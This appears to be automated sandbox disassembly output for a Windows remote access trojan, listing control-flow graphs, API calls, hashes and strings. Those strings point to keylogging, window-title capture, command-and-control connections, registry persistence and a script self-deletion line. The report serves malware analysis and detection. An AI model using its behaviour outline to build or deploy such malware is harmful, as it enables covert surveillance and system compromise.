                                          • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 448 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 461 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 448->461 462 414faf-414fb6 Sleep 448->462 477 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->477 478 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->478 462->461 477->478 531 415127-41512e 478->531 532 415119-415125 478->532 533 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 531->533 532->533 560 415210-41521e call 40482d 533->560 561 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 533->561 566 415220-415246 call 402093 * 2 call 41b580 560->566 567 41524b-415260 call 404f51 call 4048c8 560->567 583 415ade-415af0 call 404e26 call 4021fa 561->583 566->583 582 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 567->582 567->583 648 4153bb-4153c8 call 405aa6 582->648 649 4153cd-4153f4 call 401fab call 4135e1 582->649 597 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 583->597 598 415b18-415b20 call 401e8d 583->598 597->598 598->478 648->649 655 4153f6-4153f8 649->655 656 4153fb-4157ba call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 649->656 655->656 782 4157bc call 404aa1 656->782 783 4157c1-415a45 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 782->783 901 415a4a-415a51 783->901 902 415a53-415a5a 901->902 903 415a65-415a6c 901->903 902->903 904 415a5c-415a5e 902->904 905 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 903->905 906 415a6e-415a73 call 40b08c 903->906 904->903 917 415aac-415ab8 CreateThread 905->917 918 415abe-415ad9 call 401fd8 * 2 call 401f09 905->918 906->905 917->918 918->583
                                          APIs
                                          • Sleep.KERNEL32(00000000,00000029,00475300,004750F4,00000000), ref: 00414FB6
                                          • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                          • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep$ErrorLastLocalTime
                                          • String ID: | $%I64u$,aF$5.2.0 Pro$C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$HSG$Rmc-8AGIM5$TLS Off$TLS On $hlight$hd$name$pd$tMG$RG
                                          • API String ID: 524882891-350667003
                                          • Opcode ID: 79900052c1cedfcfdca54da2a4a728cafc0d46dafbcbcd06ae49b5f1d646b7e0
                                          • Instruction ID: d8c825886b0a0d8326cbfb5c9d4cc5050fd80dde9ad4bcb2ea62c87b00a1b781
                                          • Opcode Fuzzy Hash: 79900052c1cedfcfdca54da2a4a728cafc0d46dafbcbcd06ae49b5f1d646b7e0
                                          • Instruction Fuzzy Hash: 03526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

                                          Control-flow Graph

                                          APIs
                                          • connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                          • WSAGetLastError.WS2_32 ref: 00404A21
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... | $xd
                                          • API String ID: 994465650-4088167138
                                          • Opcode ID: 38b3cb5bd10e09c7b3bd40259f36f96c9113b6101ffe131655b2f6876ea9c128
                                          • Instruction ID: d7ad8a6a5323ad03425d5def7d05b30a9c8ce31cd4ccd690c712fe6c843f15aa
                                          • Opcode Fuzzy Hash: 38b3cb5bd10e09c7b3bd40259f36f96c9113b6101ffe131655b2f6876ea9c128
                                          • Instruction Fuzzy Hash: AD41E8B575060277C61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                                          Control-flow Graph

                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 0040AD73
                                          • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                          • GetForegroundWindow.USER32 ref: 0040AD84
                                          • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                          • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                          • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                          • String ID: [${ User has been idle for $ minutes }$]
                                          • API String ID: 911427763-3954389425
                                          • Opcode ID: f1beafbc65b67ea611c27b04d98e1104d59d3344b0708eb8d40cf24d2962f261
                                          • Instruction ID: 1462e2e3b317a3feaa81e481452c264ee2198f2d95b6ea563507fc8e19ff55dc
                                          • Opcode Fuzzy Hash: f1beafbc65b67ea611c27b04d98e1104d59d3344b0708eb8d40cf24d2962f261
                                          • Instruction Fuzzy Hash: 7F51E1716043419BC714FB62D846AAE7795AF84308F10093FF546A22E2EF7C9D44C69F

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1080 40da6f-40da94 call 401f86 1083 40da9a 1080->1083 1084 40dbbe-40dbe4 call 401f04 GetLongPathNameW call 40417e 1080->1084 1085 40dae0-40dae7 call 41c048 1083->1085 1086 40daa1-40daa6 1083->1086 1087 40db93-40db98 1083->1087 1088 40dad6-40dadb 1083->1088 1089 40dba9 1083->1089 1090 40db9a-40db9f call 43c11f 1083->1090 1091 40daab-40dab9 call 41b645 call 401f13 1083->1091 1092 40dacc-40dad1 1083->1092 1093 40db8c-40db91 1083->1093 1110 40dbe9-40dc56 call 40417e call 40de0c call 402fa5 * 2 call 401f09 * 5 1084->1110 1105 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1085->1105 1106 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1085->1106 1095 40dbae-40dbb3 call 43c11f 1086->1095 1087->1095 1088->1095 1089->1095 1101 40dba4-40dba7 1090->1101 1113 40dabe 1091->1113 1092->1095 1093->1095 1107 40dbb4-40dbb9 call 409092 1095->1107 1101->1089 1101->1107 1119 40dac2-40dac7 call 401f09 1105->1119 1106->1113 1107->1084 1113->1119 1119->1084
                                          APIs
                                          • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LongNamePath
                                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                          • API String ID: 82841172-425784914
                                          • Opcode ID: f4c7df661c5bec9d099b359126bde6595d68bd7cf9e1ce7f7ed169ab2082938e
                                          • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                          • Opcode Fuzzy Hash: f4c7df661c5bec9d099b359126bde6595d68bd7cf9e1ce7f7ed169ab2082938e
                                          • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

                                          Control-flow Graph

                                          APIs
                                          • Sleep.KERNEL32(00001388), ref: 0040A77B
                                            • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                            • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                            • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                            • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                          • String ID: HSG$HSG$xdF
                                          • API String ID: 3795512280-1850865910
                                          • Opcode ID: 94b06e53037e07a132a44a0c171d15b1bbffd87d4b076595ec05959e5486cbcf
                                          • Instruction ID: b4a8632174cffc949347442128fe52ffedc09667b4c22c284aa084888e76bad6
                                          • Opcode Fuzzy Hash: 94b06e53037e07a132a44a0c171d15b1bbffd87d4b076595ec05959e5486cbcf
                                          • Instruction Fuzzy Hash: AC518D716043015ACB15BB72C866ABE77AA9F80349F00483FF642B71E2DF7C9D09865E

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1277 41b354-41b3ab call 41c048 call 4135e1 call 401fe2 call 401fd8 call 406b1c 1288 41b3ad-41b3bc call 4135e1 1277->1288 1289 41b3ee-41b3f7 1277->1289 1294 41b3c1-41b3d8 call 401fab StrToIntA 1288->1294 1290 41b400 1289->1290 1291 41b3f9-41b3fe 1289->1291 1293 41b405-41b410 call 40537d 1290->1293 1291->1293 1299 41b3e6-41b3e9 call 401fd8 1294->1299 1300 41b3da-41b3e3 call 41cffa 1294->1300 1299->1289 1300->1299
                                          APIs
                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                            • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                            • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                            • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                          • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750F4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseCurrentOpenQueryValueWow64
                                          • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$hd
                                          • API String ID: 782494840-431310935
                                          • Opcode ID: 40b4b818fe30f98410963cd3dc02b2c3b2616f089d502d216bf83757675de9ba
                                          • Instruction ID: 99e2d84e4b8fa31c947f893a9fcbf762d6d1118dcb79bce5eaccee633664c5dc
                                          • Opcode Fuzzy Hash: 40b4b818fe30f98410963cd3dc02b2c3b2616f089d502d216bf83757675de9ba
                                          • Instruction Fuzzy Hash: 0311C47064414926C700F7659C97BFF76198B80304F94453BF806A71D3FB6C598683EE

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1369 41c482-41c493 1370 41c495-41c498 1369->1370 1371 41c4ab-41c4b2 1369->1371 1372 41c4a1-41c4a9 1370->1372 1373 41c49a-41c49f 1370->1373 1374 41c4b3-41c4cc CreateFileW 1371->1374 1372->1374 1373->1374 1375 41c4d2-41c4d7 1374->1375 1376 41c4ce-41c4d0 1374->1376 1378 41c4f2-41c503 WriteFile 1375->1378 1379 41c4d9-41c4e7 SetFilePointer 1375->1379 1377 41c510-41c515 1376->1377 1381 41c505 1378->1381 1382 41c507-41c50e CloseHandle 1378->1382 1379->1378 1380 41c4e9-41c4f0 CloseHandle 1379->1380 1380->1376 1381->1382 1382->1377
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                          • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                          • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseHandle$CreatePointerWrite
                                          • String ID: xpF
                                          • API String ID: 1852769593-354647465
                                          • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                          • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                          • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                          • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1383 40a6b0-40a6c0 1384 40a6c6-40a6c8 1383->1384 1385 40a75d-40a760 1383->1385 1386 40a6cb-40a6f1 call 401f04 CreateFileW 1384->1386 1389 40a731 1386->1389 1390 40a6f3-40a701 GetFileSize 1386->1390 1391 40a734-40a738 1389->1391 1392 40a703 1390->1392 1393 40a728-40a72f CloseHandle 1390->1393 1391->1386 1394 40a73a-40a73d 1391->1394 1395 40a705-40a70b 1392->1395 1396 40a70d-40a714 1392->1396 1393->1391 1394->1385 1397 40a73f-40a746 1394->1397 1395->1393 1395->1396 1398 40a716-40a718 call 40b117 1396->1398 1399 40a71d-40a722 Sleep 1396->1399 1397->1385 1400 40a748-40a758 call 409097 call 40a1b4 1397->1400 1398->1399 1399->1393 1400->1385
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                          • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                          • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseCreateHandleSizeSleep
                                          • String ID: hQG
                                          • API String ID: 1958988193-4070439852
                                          • Opcode ID: bdea57dd96df53d9e829f51e58303117b441e911e19fc522471032f737d6d9df
                                          • Instruction ID: fcd55a72cf9b38ed92eee25b8fc798016c5179a181dae4a4499eb8880f316315
                                          • Opcode Fuzzy Hash: bdea57dd96df53d9e829f51e58303117b441e911e19fc522471032f737d6d9df
                                          • Instruction Fuzzy Hash: 3E113130600740AADA30A7249889A1F37BAD741356F44483EE182676D3C67DDC64C71F

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CountEventTick
                                          • String ID: !D@$,aF
                                          • API String ID: 180926312-3317875915
                                          • Opcode ID: 835ff592c5993026ff64b06b2c7e29c4e321652dc365d191a4eb1ca34464d222
                                          • Instruction ID: a18c2cf71696728a803f4d48a8d0c2278a59ecc2ec6ff56e3a85b819d46b2ac8
                                          • Opcode Fuzzy Hash: 835ff592c5993026ff64b06b2c7e29c4e321652dc365d191a4eb1ca34464d222
                                          • Instruction Fuzzy Hash: 4F51B6315082019AC724FB32D852AFF73A5AF94304F50483FF546671E2EF3C5945C68A

                                          Control-flow Graph

                                          APIs
                                          • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread$LocalTimewsprintf
                                          • String ID: Offline Keylogger Started
                                          • API String ID: 465354869-4114347211
                                          • Opcode ID: 8ab6887ada05f8dedd4f656d1a6307b8369bab4b1d95e8e063819601f7111091
                                          • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                          • Opcode Fuzzy Hash: 8ab6887ada05f8dedd4f656d1a6307b8369bab4b1d95e8e063819601f7111091
                                          • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                          APIs
                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                          • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,00475300,?,?,0040F88E,004674C8,5.2.0 Pro), ref: 004137E1
                                          • RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.2.0 Pro), ref: 004137EC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateValue
                                          • String ID: pth_unenc
                                          • API String ID: 1818849710-4028850238
                                          • Opcode ID: 04dffd27395d5cb7a301fd27aaace46d1b2beb75a59ed872a5e7c8f8e25a915c
                                          • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                          • Opcode Fuzzy Hash: 04dffd27395d5cb7a301fd27aaace46d1b2beb75a59ed872a5e7c8f8e25a915c
                                          • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F60), ref: 00404DB3
                                          • CreateThread.KERNEL32(00000000,00000000,?,00474F08,00000000,00000000), ref: 00404DC7
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00404DDB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
